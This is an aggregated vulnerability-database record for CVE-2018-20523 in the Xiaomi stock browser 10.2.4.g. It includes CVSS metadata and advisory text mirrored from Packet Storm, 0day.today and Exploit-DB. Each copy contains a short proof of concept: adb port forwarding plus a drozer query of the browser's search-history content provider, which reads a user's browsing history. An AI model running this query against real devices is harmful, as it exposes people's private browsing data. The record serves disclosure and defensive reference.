Xiaomi 10.2.4.g Information Disclosure

2021-08-12T00:00:00

Description

{"id": "PACKETSTORM:163796", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Xiaomi 10.2.4.g Information Disclosure", "description": "", "published": "2021-08-12T00:00:00", "modified": "2021-08-12T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, "href": "https://packetstormsecurity.com/files/163796/Xiaomi-10.2.4.g-Information-Disclosure.html", "reporter": "Vishwaraj101", "references": [], "cvelist": ["CVE-2018-20523"], "immutableFields": [], "lastseen": "2021-08-12T16:08:52", "viewCount": 164, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-20523"]}, {"type": "exploitdb", "idList": ["EDB-ID:50188"]}, {"type": "zdt", "idList": ["1337DAY-ID-36632"]}], "rev": 4}, "score": {"value": -0.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2018-20523"]}, {"type": "exploitdb", "idList": ["EDB-ID:50188"]}, {"type": "zdt", "idList": ["1337DAY-ID-36632"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2018-20523", "epss": "0.011520000", "percentile": "0.826310000", "modified": "2023-03-17"}], "vulnersScore": -0.7}, "_state": {"dependencies": 1678920471, "score": 1684008354, "epss": 1679109163}, "_internal": {"score_hash": "c60741f5f7917d423add6dd59b945362"}, "sourceHref": "https://packetstormsecurity.com/files/download/163796/xiaomi1024g-disclose.txt", "sourceData": "`# Exploit Title: Xiaomi browser 10.2.4.g - Browser Search History Disclosure \n# Date: 27-Dec-2018 \n# Exploit Author: Vishwaraj101 \n# Vendor Homepage: https://www.mi.com/us \n# Software Link: https://www.apkmirror.com/apk/xiaomi-inc/mi-browse/mi-browse-10-2-4-release/ \n# Version: 10.2.4.g \n# Tested on: Tested in Android Version: 8.1.0 \n# CVE : CVE-2018-20523 \n \n*summary: * \nXiaomi Stock Browser 10.2.4.g on Xiaomi Redmi Note 5 Pro devices and other Redmi Android phones were vulnerable to content provider injection using which any 3rd party application can read the user\u2019s browser history. \n \n*Vulnerable component:* com.android.browser.searchhistory \n \n*Poc:* \n \nadb forward tcp:31415 tcp:31415 \n \ndrozer console connect \n \ndrozer > run app.provider.query \ncontent://com.android.browser.searchhistory/searchhistory \n \n*Blogpost:* \n \nhttps://vishwarajbhattrai.wordpress.com/2019/03/22/content-provider-injection-in-xiaomi-stock-browser/ \n \n`\n"}

{"zdt": [{"lastseen": "2023-06-23T17:13:59", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-08-10T00:00:00", "type": "zdt", "title": "Xiaomi browser 10.2.4.g - Browser Search History Disclosure Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-20523"], "modified": "2021-08-10T00:00:00", "id": "1337DAY-ID-36632", "href": "https://0day.today/exploit/description/36632", "sourceData": "# Exploit Title: Xiaomi browser 10.2.4.g - Browser Search History Disclosure\n# Exploit Author: Vishwaraj101\n# Vendor Homepage: https://www.mi.com/us\n# Software Link: https://www.apkmirror.com/apk/xiaomi-inc/mi-browse/mi-browse-10-2-4-release/\n# Version: 10.2.4.g\n# Tested on: Tested in Android Version: 8.1.0\n# CVE : CVE-2018-20523\n\n*summary: *\nXiaomi Stock Browser 10.2.4.g on Xiaomi Redmi Note 5 Pro devices and other Redmi Android phones were vulnerable to content provider injection using which any 3rd party application can read the user\u2019s browser history.\n\n*Vulnerable component:* com.android.browser.searchhistory\n\n*Poc:*\n\nadb forward tcp:31415 tcp:31415\n\ndrozer console connect\n\ndrozer > run app.provider.query\ncontent://com.android.browser.searchhistory/searchhistory\n\n*Blogpost:*\n\nhttps://vishwarajbhattrai.wordpress.com/2019/03/22/content-provider-injection-in-xiaomi-stock-browser/\n", "sourceHref": "https://0day.today/exploit/36632", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2023-06-23T14:51:54", "description": "Xiaomi Stock Browser 10.2.4.g on Xiaomi Redmi Note 5 Pro devices and other Redmi Android phones allows content provider injection. In other words, a third-party application can read the user's cleartext browser history via an app.provider.query content://com.android.browser.searchhistory/searchhistory request.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2019-06-07T16:29:00", "type": "cve", "title": "CVE-2018-20523", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-20523"], "modified": "2022-04-19T15:36:00", "cpe": ["cpe:/o:mi:redmi_note_5_firmware:-", "cpe:/o:mi:redmi_k20_pro_firmware:-", "cpe:/o:mi:redmi_6_firmware:-", "cpe:/a:mi:stock_browser:10.2.4g", "cpe:/o:mi:redmi_note_4_firmware:-", "cpe:/o:mi:redmi_s2_firmware:-", "cpe:/o:mi:redmi_note_6_pro_firmware:-", "cpe:/o:mi:redmi_go_firmware:-", "cpe:/o:mi:redmi_7a_firmware:-", "cpe:/o:mi:redmi_5_plus_firmware:-", "cpe:/o:mi:redmi_k20_firmware:-", "cpe:/o:mi:redmi_4a_firmware:-", "cpe:/o:mi:redmi_7_firmware:-", "cpe:/o:mi:redmi_note_5a_prime_firmware:-", "cpe:/o:mi:redmi_6a_firmware:-", "cpe:/o:mi:redmi_note_7s_firmware:-", "cpe:/o:mi:redmi_y3_firmware:-", "cpe:/o:mi:redmi_note_7_firmware:-", "cpe:/o:mi:redmi_note_5_pro_firmware:-"], "id": "CVE-2018-20523", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-20523", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:mi:redmi_5_plus_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:mi:redmi_note_4_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:mi:redmi_k20_pro_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:mi:redmi_note_6_pro_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:mi:redmi_s2_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:mi:redmi_4a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:mi:redmi_note_5_pro_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:mi:redmi_note_7_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:mi:redmi_y3_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:mi:redmi_note_7s_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:mi:redmi_7_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:a:mi:stock_browser:10.2.4g:*:*:*:*:*:*:*", "cpe:2.3:o:mi:redmi_k20_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:mi:redmi_note_5_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:mi:redmi_6a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:mi:redmi_7a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:mi:redmi_go_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:mi:redmi_6_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:mi:redmi_note_5a_prime_firmware:-:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2023-09-17T18:47:23", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-08-10T00:00:00", "type": "exploitdb", "title": "Xiaomi browser 10.2.4.g - Browser Search History Disclosure", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2018-20523", "CVE-2018-20523"], "modified": "2021-08-10T00:00:00", "id": "EDB-ID:50188", "href": "https://www.exploit-db.com/exploits/50188", "sourceData": "# Exploit Title: Xiaomi browser 10.2.4.g - Browser Search History Disclosure\r\n# Date: 27-Dec-2018\r\n# Exploit Author: Vishwaraj101\r\n# Vendor Homepage: https://www.mi.com/us\r\n# Software Link: https://www.apkmirror.com/apk/xiaomi-inc/mi-browse/mi-browse-10-2-4-release/\r\n# Version: 10.2.4.g\r\n# Tested on: Tested in Android Version: 8.1.0\r\n# CVE : CVE-2018-20523\r\n\r\n*summary: *\r\nXiaomi Stock Browser 10.2.4.g on Xiaomi Redmi Note 5 Pro devices and other Redmi Android phones were vulnerable to content provider injection using which any 3rd party application can read the user\u2019s browser history.\r\n\r\n*Vulnerable component:* com.android.browser.searchhistory\r\n\r\n*Poc:*\r\n\r\nadb forward tcp:31415 tcp:31415\r\n\r\ndrozer console connect\r\n\r\ndrozer > run app.provider.query\r\ncontent://com.android.browser.searchhistory/searchhistory\r\n\r\n*Blogpost:*\r\n\r\nhttps://vishwarajbhattrai.wordpress.com/2019/03/22/content-provider-injection-in-xiaomi-stock-browser/", "sourceHref": "https://www.exploit-db.com/raw/50188", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}

Xiaomi 10.2.4.g Information Disclosure

Description

Related